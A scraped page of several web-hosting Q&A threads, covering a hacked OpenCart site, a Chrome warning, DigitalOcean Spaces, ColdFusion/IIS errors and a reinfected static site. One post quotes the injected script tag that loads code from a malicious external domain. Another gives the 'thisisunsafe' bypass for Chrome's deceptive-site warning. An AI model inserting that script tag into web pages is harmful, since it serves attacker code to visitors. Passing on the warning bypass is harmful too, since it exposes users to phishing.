Can't remove a "security" folder from the server via FTP - opencart

I currently host a website on Hostgator. My site redirects to an Adobe Flash Update automatically. I contacted support at Hostgator and they did not want to help, they said I need to contact sitelock to remove the malware is causing the redirection.
I ftp in to the server and found there is a ".security" folder which seems to be the cause of the problem. It has some zip files and other php files. I cannot change its permissions nor delete it.
Does anyone knows how can I remove this malware from the server? Any help is welcome thank you.

In reference to my last issue with Hostgator and a Malware site.
The site was running OpenCart and I found that the origin of the problem was within the back end of OpenCart, specifically under Settings > Server > Google Analytics Code with a suspicious domain in the text area.
`<!-- startgoogle -->
<script src="http://nam.su/google2"></script>
<!-- endgoogle --></head>`
Whoever did this to the site was able to login and manually enter the script in the poorly escaped and sanitize text area. Therefore making a mess. I just hope that I don't get banned from this site for publishing the link above but I think that someone may come across a similar problem and find this 'honest' mistake, useful. I am also interested in what's wrong with OpenCart's textarea.

Related

Deceptive site ahead google chrome when i tried to open the ngrok url

recently I came across this issue when I exposed my port via ngRok.
I simply forwarded it but when I tried to open the ngRok url I got Deceptive site ahead warning.
Here is the image of the warning.
It was a django server with graphql and I wanted to test graphiql. (this point might not be necessary for the reader but more info is always better than no info)
So the solution I found was to click on the red empty area and type "thisisunsafe" (without quotes of-course)
PS: I searched for the solution but couldn't find any I hope this will help others who are looking for the same.
Another workaround that I found is using that same URL in an incognito window. I'm not sure why the security is more lax there...but it works.

Redirect wrong URL/path DigitalOcean Spaces

I'm using Digital Ocean Spaces CDN to host a static website, so far so good, if I it my index.html everything is working as expected.
The problem I'm facing now, is that if the user hit any path which that is not index.html it gets back an Access Denied error.
I've looked inside the Digital Ocean Spaces CDN Settings and found nothing about redirecting on wrong url/path
Is there a way I could achieve that?
I would need a service like cloudflare in front of my CDN?
Sorry, but looking around on the web got me nowhere so far.
You need to check a couple of things:
You need to make all HTML files public
Enable File Listing
DO Spaces does not support static page hosting (if someone visits your domain, you cant make redirection from "/" to "/index.html". IMO that's big no no. If you want free static hosting, just use https://www.netlify.com/ or git hosts (Github and Gitlab).

CF11 LocalHost 404 Issue

I've just recently installed CF11 on a new machine but I'm encountering the below issue when trying to navigate to the localhost directory in a browser.
On my previous machine which was using CF10 I was able to get the directory listings and navigate through folders to specific pages so is it some setting that I am missing?
I can navigate to CFAdmin okay and have added a whole range of aliases in my server.xml file which I can navigate to, as well as adding the CFIDE and WEB-INF ones.
As an aside, I also seem to get that silly 404 badge in front of CFs debug output when I try and navigate to a page that doesn't yet exist. Is there a way to switch it off?
If you need more details let me know.
Thanks in advance

CF10 developer on IIS7.5 / WIN7 - CFM files run ok - but can't see .GIFs

Can anyone help with this strange problem.
I have just installed CF10 developer on Win7 which is using IIS7.5.
Installation went smooth, and can browse .cfm files no problem and connect to datasources no problem .. BUT: even though I can browse all my local cf sites, none of the sites will display images or styles for external .CSS files.
So, I get the site, content from the database, and all the functionality of cfm files being parsed OK, but no styles and no images.
If I browse directly (pasting the filepath in the browser) to one of the images I get a 404 error - file not found - even though the .gif file does indeed exist in the directory.
So, basically, I can run CFM files, and browse a local site built in coldfusion, but none of the images or externally referenced css files will be "found" by the browser/IIS.
Can anyone help?
Thanks in advance if someone can..
Sounds like an issue with those mimetypes, please see the following for information on installing the static content role to IIS and enabling those mimetypes to be served.
No Mime Types Option in IIS 7
Be sure to enable static content in IIS 7.
Had two occurrences of this problem lately.
See here:
http://weblogs.asp.net/anasghanem/archive/2008/05/23/don-t-forget-to-check-quot-static-content-service-quot-in-iis7-installation.aspx
Try restarting the IIS server. Close all browsers and restart.
You need to determine if it is a CF issue or an IIS issue. Try the following:
Check to see if this is an issue with images not being served vs broken paths to the images. There may be CFML code that is creating links to invalid locations.
If the locations are valid then it would be an issue with IIS not server image files.
Also check to see if there is a similar issue with JPEG and PNG files. If JPEGs and PNGs show up, this suggests an IIS issue.
Also try creating a simple HTML page that has an image on it. If it has an image on it, this suggests a CF issue

Is it possible to be attacked with XSS on a static page (i.e. without PHP)?

A client I'm working for has mysteriously ended up with some malicious scripting going on on their site. I'm a little baffled however because the site is static and not dynamically generated - no PHP, Rails, etc. At the bottom of the page though, somebody opened a new tag and a script. When I opened the file on the webserver and stripped the malicious stuff and re-uploaded, it was still there. How is this possible? And more importantly, how can I combat this?
EDIT:
To make it weirder, I just noticed the script only shows up in the source if the page is accessed directly as 'domain.com/index.html' but not as just 'domain.com'.
EDIT2:
At any rate, I found some php file (x76x09.php) sitting on the web server that must have been updating the html file despite my attempts to strip it of the script. I'm currently in the clear but I do have to do some work to make sure rogue files don't just appear again and cause problems. If anyone has any suggestions on this feel free to leave a comment, otherwise thanks for the help everyone! It was very much appreciated!
No it's not possible unless someone has access to your files. So in your case someone has access to your files.
Edit: It's best if you ask in serverfault.com regarding what to do in case the server is compromised, but:
change your shell passwords
have a look at /var/log/messages for login attempts
finger root
have a look at last modification time of those files
There is also a high propability that the files where altered via http by using a vulnerability of a software component you use together with the static files.
To the point about the site not having pages executing on the server, XSS is absolutely still possible using a DOM based attack. Usually this will relate to JavaScript execution outputting content to the page. Just last week WhiteHat Security had an XSS vulnerability identified on a purely “static” page.
It may well be that the attack vector relates to file level access but I suggest it’s also worthwhile taking a look at what’s going on JS wise.
You should probably talk to your hosting company about this. Also, check that your file permissions aren't more lenient than they should be for your particular environment.
That's happened to me before - this happens if they get your ftp details. So, whoever did it, obviously got ahold of your ftp details somehow.
Best thing to do is change your password and contact your webhosting company to figure out a better solution.
Unfortunately, FTP isn't the most secure...